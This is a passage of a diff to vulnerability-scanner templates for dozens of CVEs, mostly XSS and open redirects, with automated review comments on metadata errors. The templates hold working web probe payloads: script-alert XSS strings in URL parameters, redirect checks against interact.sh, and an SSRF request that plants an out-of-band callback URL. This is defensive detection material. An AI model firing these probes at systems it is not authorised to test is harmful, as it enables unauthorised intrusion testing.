cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
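Review bot: the first reference, `https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D`, is a generic forum listing rather than an advisory; with the DrunkenShells disclosure and the NVD entry already listed it can be dropped. The new description also reads "before 5.2.6, 6.0.N and 6.1.N", which makes 6.0.N and 6.1.N sound like version thresholds rather than affected release branches; the original "versions below 5.2.6, 6.0.N and 6.1.N" had the same ambiguity, so it is worth spelling out.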
@ -31,4 +31,6 @@ requests:
- type: regex
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
# Enhanced by md on 2022/10/13

View File

@ -1,7 +1,7 @@
id: CVE-2019-14696
info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14696
cwe-id: CWE-79
tags: packetstorm,cve,cve2019,xss
tags: xss,open-school,packetstorm,cve,cve2019
requests:
- method: GET
@ -24,12 +24,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/08/08

View File

@ -1,21 +1,22 @@
id: CVE-2019-18957
info:
name: Microstrategy Library before 11.1.3 XSS
name: MicroStrategy Library <11.1.3 - Cross-Site Scripting
author: tess
severity: medium
description: |
Microstrategy Library in MicroStrategy before 2019 before 11.1.3 has reflected XSS.
MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18957
- https://www.cvedetails.com/cve/CVE-2019-18957/
- https://seclists.org/bugtraq/2019/Nov/23
- https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-18957
cwe-id: CWE-79
tags: xss,seclists,cve,cve2019,microstrategy
tags: cve2019,microstrategy,packetstorm,xss,seclists,cve
requests:
- method: GET
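Review bot: `remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.` names version 1.1.3, but the title and description give the fixed version as 11.1.3; correct the remediation line while this file is being touched.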
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

View File

@ -4,7 +4,8 @@ info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
description: |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
@ -15,20 +16,30 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
tags: cve,cve2019,xss,injection,javascript
metadata:
verified: true
google-dork: inurl:"/plus/pass_reset.php"
tags: cve,cve2019,phpMyChat,xss
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username = "</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body
# Enhanced by mp on 2022/08/31
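Review bot: the new tag `phpMyChat` is mixed case while the other product tags in this commit (`open-school`, `microstrategy`, `tomcat`, `jira`) are lowercase; use `phpmychat` so tag-based filtering stays consistent. The bare `verified: true` here is the form the rest of the commit should follow.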

View File

@ -1,10 +1,11 @@
id: CVE-2019-3402
info:
name: Jira <8.1.1 - Cross-Site Scripting
name: Jira < 8.1.1 - Cross-Site Scripting
author: pdteam
severity: medium
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
description: |
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
reference:
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
- https://jira.atlassian.com/browse/JRASERVER-69243
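Review bot: the title goes from `Jira <8.1.1` to `Jira < 8.1.1`, which is the opposite of what this same commit does elsewhere (`FineCMS <5.0.9`, `dotCMS <5.0.2`, `Eventum <3.4.0`, `MicroStrategy Library <11.1.3`, all without the space); keep the no-space form.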
@ -15,6 +16,7 @@ info:
cve-id: CVE-2019-3402
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2019,atlassian,jira,xss
@ -25,12 +27,18 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'<script>alert(1)</script>' does not exist"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1)</script>"
part: body
# Enhanced by mp on 2022/08/31

View File

@ -1,13 +1,14 @@
id: CVE-2019-3912
info:
name: LabKey Server < 18.3.0 - Open Redirect
name: LabKey Server Community Edition <18.3.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites.
description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.tenable.com/security/research/tra-2019-03
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -1,15 +1,16 @@
id: CVE-2019-7275
info:
name: Open Redirect in Optergy Proton/Enterprise BMS
name: Optergy Proton/Enterprise Building Management System - Open Redirect
author: 0x_Akoko
severity: medium
description: Optergy Proton/Enterprise devices allow Open Redirect.
description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
- https://applied-risk.com/resources/ar-2019-008
- https://cxsecurity.com/issue/WLB-2019110074
- https://applied-risk.com/labs/advisories
- https://nvd.nist.gov/vuln/detail/CVE-2019-7275
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
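Review bot: neither the new `name` nor the new `description` states an affected version, although the packetstormsecurity reference in the same hunk is titled for Optergy Proton/Enterprise BMS 2.3.0a; add the affected version to the name and description, as the other renamed templates in this commit do, so users can triage matches against their deployed release.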
@ -27,3 +28,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/13

View File

@ -1,15 +1,16 @@
id: CVE-2019-9915
info:
name: GetSimpleCMS 3.3.13 - Open Redirection
name: GetSimple CMS 3.3.13 - Open Redirect
author: 0x_Akoko
severity: medium
description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter.
description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
- https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
- https://www.cvedetails.com/cve/CVE-2019-9915
- https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9915
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13
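Review bot: the regex ends in `interact\.sh\/`, which requires a trailing slash after the host, so a `Location: https://interact.sh` redirect with no path would not match; the trailing comment points at the same regex101 link as the variant used in the CVE-2019-3912 template (`interact\.sh\/?(\/|[^.].*)?$`), which tolerates the missing slash, so use that variant here as well.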

View File

@ -21,13 +21,16 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/secure/ViewUserHover.jspa"
- '{{BaseURL}}/secure/ViewUserHover.jspa'
matchers-condition: and
matchers:
- type: word
words:
- "User does not exist"
- 'User does not exist'
- 'content="JIRA"'
condition: and
- type: status
status:
- 200

View File

@ -1,15 +1,16 @@
id: CVE-2020-15129
info:
name: Open-redirect in Traefik
name: Traefik - Open Redirect
author: dwisiswant0
severity: medium
description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik
- https://github.com/containous/traefik/releases/tag/v2.2.8
- https://github.com/containous/traefik/pull/7109
- https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15129
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
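Review bot: the rewritten description drops the old caveat that exploitation requires the attacker to inject the X-Forwarded-Prefix header, which is exactly what the retained `AC:H` in `cvss-metrics` expresses; keep one sentence on that precondition so the 4.7 score and the prose stay consistent.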
@ -35,3 +36,5 @@ requests:
part: body
words:
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
# Enhanced by md on 2022/10/13

View File

@ -1,20 +1,22 @@
id: CVE-2020-17526
info:
name: Apache Airflow < 1.10.14 - Authentication Bypass
name: Apache Airflow <1.10.14 - Authentication Bypass
author: piyushchhiroliya
severity: high
description: |
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
reference:
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
- http://www.openwall.com/lists/oss-security/2020/12/21/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
remediation: Change default value for [webserver] secret_key config.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2020-17526
cwe-id: CWE-287
metadata:
fofa-query: Apache Airflow
verified: "true"
@ -49,3 +51,5 @@ requests:
- "contains(body_1, 'Redirecting...')"
- "status_code_1 == 302"
condition: and
# Enhanced by md on 2022/10/19

View File

@ -1,14 +1,15 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 - Open Redirect
name: Z-Blog <=1.5.2 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
- https://github.com/zblogcn/zblogphp/issues/209
- https://nvd.nist.gov/vuln/detail/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

View File

@ -1,11 +1,11 @@
id: CVE-2020-20285
info:
name: zzcms - Reflected XSS
name: ZZcms - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

View File

@ -1,14 +1,15 @@
id: CVE-2020-22840
info:
name: b2evolution CMS - Open Redirect
name: b2evolution CMS <6.11.6 - Open Redirect
author: geeknik
severity: medium
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/b2evolution/b2evolution/issues/102
- http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html
- https://www.exploit-db.com/exploits/49554
- https://nvd.nist.gov/vuln/detail/CVE-2020-22840
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -26,3 +27,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
# Enhanced by md on 2022/10/13

View File

@ -1,13 +1,14 @@
id: CVE-2020-23015
info:
name: OPNsense 20.1.5. Open Redirect
name: OPNsense <=20.1.5 - Open Redirect
author: 0x_Akoko
severity: medium
description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website.
description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/opnsense/core/issues/4061
- https://www.cvedetails.com/cve/CVE-2020-23015
- https://nvd.nist.gov/vuln/detail/CVE-2020-23015
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,4 +26,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by md on 2022/10/13

View File

@ -1,12 +1,13 @@
id: CVE-2020-24550
info:
name: EpiServer <13.2.7 - Open Redirect
name: EpiServer Find <13.2.7 - Open Redirect
author: dhiyaneshDK
severity: medium
description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL.
description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24550
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
- type: status
status:
- 301
# Enhanced by md on 2022/10/13

View File

@ -15,7 +15,7 @@ info:
cvss-score: 10
cve-id: CVE-2020-35489
cwe-id: CWE-434
tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive
requests:
- method: GET

View File

@ -1,14 +1,15 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open Redirect
name: Smartstore <4.1.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
- https://nvd.nist.gov/vuln/detail/CVE-2020-36365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

View File

@ -1,10 +1,11 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
name: SAP - Unauthenticated Blind SSRF
author: madrobot
severity: medium
description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
@ -14,17 +15,25 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
tags: cve,cve2020,sap,ssrf,oast,blind
tags: cve,cve2020,sap,ssrf,oast,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
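Review bot: the new `part: location` matcher expects the full `{{BaseURL}}/AdminTools/querybuilder/logonform.jsp` string, so under `matchers-condition: and` a server that answers with a relative `Location: /AdminTools/querybuilder/logonform.jsp`, or an absolute one on a different scheme or port than BaseURL, fails the template even though the `dns` interaction already confirmed the SSRF; match on the path suffix `/AdminTools/querybuilder/logonform.jsp` instead. The `blind` tag was also removed even though detection still relies solely on the out-of-band DNS callback; swapping `admin`/`admin` for `anything`/`anything` in the body is a welcome change, since the check does not depend on credentials.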

View File

@ -1,19 +1,17 @@
id: CVE-2020-8772
info:
name: WordPress InfiniteWP Client < 1.9.4.5 - Authentication Bypass
name: WordPress InfiniteWP <1.9.4.5 - Authorization Bypass
author: princechaddha,scent2d
severity: critical
description: |
The InfiniteWP Client plugin before 1.9.4.5 for WordPress has a missing
authorization check in iwp_mmb_set_request in init.php. Any attacker who
knows the username of an administrator can log in.
WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: Upgrade to InfiniteWP 1.9.4.5 or higher.
reference:
- https://wpscan.com/vulnerability/10011
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
- https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/
- https://wpvulndb.com/vulnerabilities/10011
remediation: Upgrade to InfiniteWP Client 1.9.4.5 or higher.
- https://nvd.nist.gov/vuln/detail/CVE-2020-8772
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
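Review bot: the new description reads `WordPress InfiniteWP plugin before 1.9.4.5 for WordPress`, repeating WordPress; drop the trailing `for WordPress`. In the reference list, https://wpvulndb.com/vulnerabilities/10011 and https://wpscan.com/vulnerability/10011 point to the same advisory (wpvulndb was renamed to wpscan), so one of the two can go.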
@ -72,3 +70,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/19

View File

@ -1,15 +1,15 @@
id: CVE-2021-1499
info:
name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
author: gy741
severity: medium
description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
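Review bot: the rewritten description no longer says that the upload function lacks authentication, which is the root cause named in the old text and the reason for `PR:N` in the retained `cvss-metrics`; keep a clause such as "due to missing authentication for the upload function" so the unauthenticated nature of the issue remains visible to readers of the template.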
@ -53,3 +53,5 @@ requests:
- '"filename:'
- '/tmp/passwd9'
condition: and
# Enhanced by md on 2022/10/20

View File

@ -1,15 +1,15 @@
id: CVE-2021-20031
info:
name: Sonicwall SonicOS 7.0 - Host Header Injection
name: SonicWall SonicOS 7.0 - Open Redirect
author: gy741
severity: medium
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site.
reference:
- https://www.exploit-db.com/exploits/50414
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019
- http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
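Review bot: the new description contains a stray full stop in `execute unauthorized operations. and/or possibly redirect a user`, leaving a sentence fragment; replace it with a comma. The rename from Host Header Injection to Open Redirect is also a reclassification, yet the description still only explains that Host header values are trusted; say explicitly that the spoofed Host ends up in a redirect or generated link so the title and the text agree.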
@ -37,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/14

View File

@ -1,15 +1,15 @@
id: CVE-2021-22873
info:
name: Revive Adserver < 5.1.0 Open Redirect
name: Revive Adserver <5.1.0 - Open Redirect
author: pudsec
severity: medium
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
- https://hackerone.com/reports/1081406
- https://github.com/revive-adserver/revive-adserver/issues/1068
- http://seclists.org/fulldisclosure/2021/Jan/60
- https://nvd.nist.gov/vuln/detail/CVE-2021-22873
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -38,3 +38,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

View File

@ -1,16 +1,17 @@
id: CVE-2021-22911
info:
name: RocketChat - NoSQL injection
name: Rocket.Chat <=3.13 - NoSQL Injection
author: tess,sullo
severity: critical
description: Rocket.Chat server versions 3.11, 3.12 and 3.1 allow unauthenticated access to an API endpoint which leads to NoSQL injection in the database.
description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html
- https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911
- https://hackerone.com/reports/1130721
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
- https://nvd.nist.gov/vuln/detail/CVE-2021-22911
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -47,3 +48,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

View File

@ -1,15 +1,15 @@
id: CVE-2021-24165
info:
